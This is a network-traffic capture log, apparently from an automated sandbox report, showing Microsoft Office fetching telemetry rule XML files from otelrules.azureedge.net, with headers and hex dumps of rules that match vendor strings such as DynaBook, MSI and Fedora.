2024-11-30 11:48:15 UTC	192	OUT	GET /rules/rule120638v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-30 11:48:16 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 30 Nov 2024 11:48:15 GMT Content-Type: text/xml Content-Length: 486 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:35 GMT ETag: "0x8DC582B92FCB436" x-ms-request-id: 390b1506-101e-0017-0101-4247c7000000 x-ms-version: 2018-03-28 x-azure-ref: 20241130T114815Z-174f7845968xlwnmhC1EWR0sv8000000116g000000006c50 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-30 11:48:16 UTC	486	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120638" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
42	192.168.2.4	49791	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-30 11:48:15 UTC	192	OUT	GET /rules/rule120639v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-30 11:48:16 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 30 Nov 2024 11:48:15 GMT Content-Type: text/xml Content-Length: 423 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:36 GMT ETag: "0x8DC582BB7564CE8" x-ms-request-id: 9dc9d887-801e-0015-73b3-42f97f000000 x-ms-version: 2018-03-28 x-azure-ref: 20241130T114815Z-174f7845968xlwnmhC1EWR0sv8000000115g000000007dm2 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-30 11:48:16 UTC	423	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 44 64 5d 5b 59 79 5d 5b 4e 6e 5d 5b 41 61 5d 5b 42 62 5d 5b 4f 6f 5d 5b 4f 6f 5d 5b 4b 6b 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120639" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <SR T="2" R="([Dd][Yy][Nn][Aa][Bb][Oo][Oo][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0

Session ID	Source IP	Source Port	Destination IP	Destination Port
43	192.168.2.4	49792	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-30 11:48:17 UTC	192	OUT	GET /rules/rule120640v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-30 11:48:18 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 30 Nov 2024 11:48:17 GMT Content-Type: text/xml Content-Length: 478 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:48 GMT ETag: "0x8DC582B9B233827" x-ms-request-id: 691215a9-b01e-0084-78b4-42d736000000 x-ms-version: 2018-03-28 x-azure-ref: 20241130T114817Z-174f7845968pf68xhC1EWRr4h800000011hg000000008ra1 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-30 11:48:18 UTC	478	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120640" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
44	192.168.2.4	49794	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-30 11:48:17 UTC	192	OUT	GET /rules/rule120642v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-30 11:48:18 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 30 Nov 2024 11:48:17 GMT Content-Type: text/xml Content-Length: 468 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:24 GMT ETag: "0x8DC582BB046B576" x-ms-request-id: be7987d0-001e-0034-1e91-3fdd04000000 x-ms-version: 2018-03-28 x-azure-ref: 20241130T114817Z-174f7845968nxc96hC1EWRspw8000000111g0000000092c2 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-30 11:48:18 UTC	468	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120642" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
45	192.168.2.4	49795	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-30 11:48:17 UTC	192	OUT	GET /rules/rule120643v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-30 11:48:18 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 30 Nov 2024 11:48:18 GMT Content-Type: text/xml Content-Length: 400 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT ETag: "0x8DC582BB2D62837" x-ms-request-id: 203bed18-201e-006e-51a9-42bbe3000000 x-ms-version: 2018-03-28 x-azure-ref: 20241130T114818Z-174f78459684db9fhC1EWRc7g400000001eg000000002yq0 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-30 11:48:18 UTC	400	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4c 6c 5d 5b 47 67 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120643" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <SR T="2" R="^([Ll][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S T="

Session ID	Source IP	Source Port	Destination IP	Destination Port
46	192.168.2.4	49793	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-30 11:48:17 UTC	192	OUT	GET /rules/rule120641v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-30 11:48:18 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 30 Nov 2024 11:48:18 GMT Content-Type: text/xml Content-Length: 404 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:39 GMT ETag: "0x8DC582B95C61A3C" x-ms-request-id: e52ede4a-001e-0017-0591-3f0c3c000000 x-ms-version: 2018-03-28 x-azure-ref: 20241130T114818Z-174f7845968frfdmhC1EWRxxbw00000011h00000000015ca x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-30 11:48:18 UTC	404	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4d 6d 5d 5b 53 73 5d 5b 49 69 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120641" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <SR T="2" R="^([Mm][Ss][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S

Session ID	Source IP	Source Port	Destination IP	Destination Port
47	192.168.2.4	49796	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-30 11:48:17 UTC	192	OUT	GET /rules/rule120644v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-30 11:48:18 UTC	491	IN	HTTP/1.1 200 OK Date: Sat, 30 Nov 2024 11:48:18 GMT Content-Type: text/xml Content-Length: 479 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT ETag: "0x8DC582BB7D702D0" x-ms-request-id: 4edae9bd-001e-0017-14b4-420c3c000000 x-ms-version: 2018-03-28 x-azure-ref: 20241130T114818Z-174f7845968glpgnhC1EWR7uec00000011hg0000000059et x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-11-30 11:48:18 UTC	479	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120644" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
48	192.168.2.4	49797	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-30 11:48:19 UTC	192	OUT	GET /rules/rule120645v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-30 11:48:20 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 30 Nov 2024 11:48:20 GMT Content-Type: text/xml Content-Length: 425 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:40 GMT ETag: "0x8DC582BBA25094F" x-ms-request-id: b8a9d872-301e-003f-6bb3-42266f000000 x-ms-version: 2018-03-28 x-azure-ref: 20241130T114820Z-174f78459684db9fhC1EWRc7g4000000018g00000000b6ax x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-30 11:48:20 UTC	425	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 4d 6d 5d 5b 41 61 5d 5b 5a 7a 5d 5b 4f 6f 5d 5b 4e 6e 5d 20 5b 45 65 5d 5b 43 63 5d 32 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120645" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <SR T="2" R="([Aa][Mm][Aa][Zz][Oo][Nn] [Ee][Cc]2)"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I=

Session ID	Source IP	Source Port	Destination IP	Destination Port
49	192.168.2.4	49799	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-30 11:48:20 UTC	192	OUT	GET /rules/rule120647v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-30 11:48:20 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 30 Nov 2024 11:48:20 GMT Content-Type: text/xml Content-Length: 448 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT ETag: "0x8DC582BB389F49B" x-ms-request-id: e14f358b-d01e-007a-5d7e-3ff38c000000 x-ms-version: 2018-03-28 x-azure-ref: 20241130T114820Z-174f7845968nxc96hC1EWRspw80000001120000000007p5s x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-30 11:48:20 UTC	448	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 50 70 5d 5b 41 61 5d 5b 43 63 5d 5b 48 68 5d 5b 45 65 5d 20 5b 53 73 5d 5b 4f 6f 5d 5b 46 66 5d 5b 54 74 5d 5b 57 77 5d 5b 41 61 5d 5b 52 72 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120647" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <SR T="2" R="([Aa][Pp][Aa][Cc][Hh][Ee] [Ss][Oo][Ff][Tt][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR>

Session ID	Source IP	Source Port	Destination IP	Destination Port
50	192.168.2.4	49800	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-30 11:48:20 UTC	192	OUT	GET /rules/rule120648v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-30 11:48:20 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 30 Nov 2024 11:48:20 GMT Content-Type: text/xml Content-Length: 491 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT ETag: "0x8DC582B98B88612" x-ms-request-id: d392c6ed-201e-0033-72af-42b167000000 x-ms-version: 2018-03-28 x-azure-ref: 20241130T114820Z-174f78459684db9fhC1EWRc7g400000001e0000000003rvb x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-30 11:48:20 UTC	491	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120648" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
51	192.168.2.4	49801	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-30 11:48:20 UTC	192	OUT	GET /rules/rule120649v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-30 11:48:20 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 30 Nov 2024 11:48:20 GMT Content-Type: text/xml Content-Length: 416 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:21 GMT ETag: "0x8DC582BAEA4B445" x-ms-request-id: 3fc8ca9f-401e-0083-6c91-3f075c000000 x-ms-version: 2018-03-28 x-azure-ref: 20241130T114820Z-174f7845968px8v7hC1EWR08ng00000011mg0000000075fx x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-30 11:48:20 UTC	416	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 46 66 5d 5b 45 65 5d 5b 44 64 5d 5b 4f 6f 5d 5b 52 72 5d 5b 41 61 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120649" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <SR T="2" R="^([Ff][Ee][Dd][Oo][Rr][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tr

Session ID	Source IP	Source Port	Destination IP	Destination Port
52	192.168.2.4	49798	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-30 11:48:22 UTC	192	OUT	GET /rules/rule120646v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-30 11:48:22 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 30 Nov 2024 11:48:22 GMT Content-Type: text/xml Content-Length: 475 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT ETag: "0x8DC582BB2BE84FD" x-ms-request-id: fac49ef3-501e-008f-0a91-3f9054000000 x-ms-version: 2018-03-28 x-azure-ref: 20241130T114822Z-174f7845968kvnqxhC1EWRmf3g0000000n2g000000009f8z x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-30 11:48:22 UTC	475	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120646" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />
